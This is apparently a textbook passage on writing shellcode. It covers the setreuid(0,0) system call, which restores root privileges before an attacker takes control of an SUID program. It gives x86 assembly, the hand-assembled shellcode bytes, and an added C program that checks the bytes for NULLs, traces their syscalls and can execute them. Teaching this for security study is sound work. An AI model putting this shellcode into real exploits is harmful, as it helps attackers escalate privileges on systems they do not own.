setreuid System Call
As discussed in Chapter 7, the target of our attack will often be an SUID program. However,
well-written SUID programs drop their elevated privileges when they are not needed. In
that case, it may be necessary to restore those privileges before taking control. The
setreuid system call sets the process's real and effective user IDs, and is what we use to restore them.
Note that this only works if the program dropped just its effective UID (for example with seteuid(getuid())) and
left the saved set-user-ID as root; a program that dropped all three IDs with setuid(getuid()) or setresuid()
cannot regain root, and setreuid(0,0) simply fails with EPERM.
setreuid Signature
Remember, the highest privilege to have is that of root (0). The signature of the
setreuid(0,0) system call is as follows:
• eax 0x46 for syscall #70 (from the unistd.h file shown earlier)
• ebx First parameter, real user ID (ruid), in this case 0x0
• ecx Second parameter, effective user ID (euid), in this case 0x0
This time, we will start directly with the assembly.
Starting with Assembly
The following assembly file will execute the setreuid(0,0) system call:
$ cat setreuid.asm
section .text      ; start the code section of the asm
global _start      ; declare a global label
_start:            ; keeps the linker from complaining or guessing
xor eax, eax       ; clear the eax register, prepare for next line
mov al, 0x46       ; set the syscall value to decimal 70 or hex 46, one byte (no NULL bytes)
xor ebx, ebx       ; clear the ebx register, ruid = 0
xor ecx, ecx       ; clear the ecx register, euid = 0
int 0x80           ; call kernel to execute setreuid(0,0)
mov al, 0x01       ; set the syscall number to 1 for exit(); ebx is still 0, so exit(0)
int 0x80           ; call kernel to execute the syscall
As you can see, we simply load up the registers and call int 0x80. Because ebx is still 0
when exit() is invoked, the process exits with status 0.
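The following program is an added example, not code from the book: it carries setreuid.asm hand-assembled into bytes and runs the two checks a practitioner performs before dropping shellcode into an exploit buffer, namely that it contains no NULL bytes (a strcpy()-style overflow would truncate it) and that the int 0x80 calls it issues really are setreuid(0,0) followed by exit(0). The byte encodings, the syscall numbers 70 and 1, and the int 0x80 convention assume the 32-bit Linux x86 ABI the chapter uses; the tiny interpreter only understands the three instruction forms the shellcode uses and is an assumption of this example, not a general disassembler.

```c
/* Added example (not from the book): setreuid.asm as raw bytes plus the
 * checks you run before using it as shellcode. Assumes the 32-bit Linux
 * x86 ABI: int 0x80, __NR_setreuid = 70, __NR_exit = 1. */
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>

/* Hand-assembled encoding of setreuid.asm, instruction by instruction. */
static const unsigned char setreuid_shellcode[] = {
    0x31, 0xc0,   /* xor eax, eax                          */
    0xb0, 0x46,   /* mov al, 0x46   ; syscall 70, setreuid */
    0x31, 0xdb,   /* xor ebx, ebx   ; ruid = 0             */
    0x31, 0xc9,   /* xor ecx, ecx   ; euid = 0             */
    0xcd, 0x80,   /* int 0x80                              */
    0xb0, 0x01,   /* mov al, 0x01   ; syscall 1, exit      */
    0xcd, 0x80    /* int 0x80       ; ebx is still 0       */
};

size_t setreuid_shellcode_len(void) { return sizeof setreuid_shellcode; }
const unsigned char *setreuid_shellcode_bytes(void) { return setreuid_shellcode; }

/* strcpy()-style overflows stop at the first 0x00, so shellcode must be
 * NULL-free. Returns how many NULL bytes the buffer contains. */
size_t count_null_bytes(const unsigned char *code, size_t len)
{
    size_t nulls = 0;
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0x00) nulls++;
    return nulls;
}

struct syscall_rec { unsigned int nr, ebx, ecx; };

/* Minimal interpreter for exactly the encodings used above:
 *   31 /r    xor r32, r32   (only the reg == rm zeroing form)
 *   B0+r ib  mov r8, imm8   (al, cl, dl, bl)
 *   CD 80    int 0x80
 * Records eax/ebx/ecx at each int 0x80. Returns the number of syscalls
 * recorded, or -1 on an encoding it does not understand. */
int trace_shellcode(const unsigned char *code, size_t len,
                    struct syscall_rec *out, int max)
{
    unsigned int reg[8] = {0};  /* eax, ecx, edx, ebx, esp, ebp, esi, edi */
    int n = 0;
    size_t i = 0;
    while (i < len) {
        unsigned char op = code[i];
        if (op == 0x31 && i + 1 < len) {
            unsigned char modrm = code[i + 1];
            unsigned int r = (modrm >> 3) & 7, rm = modrm & 7;
            if ((modrm >> 6) != 3 || r != rm) return -1;
            reg[r] = 0;
            i += 2;
        } else if (op >= 0xb0 && op <= 0xb3 && i + 1 < len) {
            unsigned int r = op - 0xb0;
            reg[r] = (reg[r] & 0xffffff00u) | code[i + 1];
            i += 2;
        } else if (op == 0xcd && i + 1 < len && code[i + 1] == 0x80) {
            if (n >= max) return -1;
            out[n].nr = reg[0]; out[n].ebx = reg[3]; out[n].ecx = reg[1];
            n++;
            i += 2;
        } else {
            return -1;
        }
    }
    return n;
}

/* 1 if the bytes issue exactly setreuid(0,0) then exit(0), else 0. */
int shellcode_is_setreuid_then_exit(void)
{
    struct syscall_rec c[4];
    int n = trace_shellcode(setreuid_shellcode, sizeof setreuid_shellcode, c, 4);
    return n == 2 && c[0].nr == 70 && c[0].ebx == 0 && c[0].ecx == 0
                  && c[1].nr == 1  && c[1].ebx == 0;
}

#if defined(__i386__) && defined(__linux__)
/* Execute the bytes for real (32-bit build only, e.g. gcc -m32). The
 * shellcode exits the process itself, so watch it with: strace ./a.out --run */
static void run_shellcode(void)
{
    void *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) { perror("mmap"); exit(1); }
    memcpy(page, setreuid_shellcode, sizeof setreuid_shellcode);
    ((void (*)(void))page)();
}
#endif

int main(int argc, char **argv)
{
    size_t len = setreuid_shellcode_len();
    printf("shellcode: %zu bytes, %zu NULL bytes, setreuid(0,0)+exit(0): %s\n",
           len, count_null_bytes(setreuid_shellcode, len),
           shellcode_is_setreuid_then_exit() ? "yes" : "no");
#if defined(__i386__) && defined(__linux__)
    if (argc > 1 && strcmp(argv[1], "--run") == 0) run_shellcode();
#else
    (void)argc; (void)argv;
#endif
    return 0;
}
```

Build with gcc -m32 on a 32-bit-capable Linux box to use --run; under strace you should see setreuid(0, 0) followed by exit(0), and as a non-root user the setreuid call returns EPERM, which is exactly the saved-set-user-ID caveat described above.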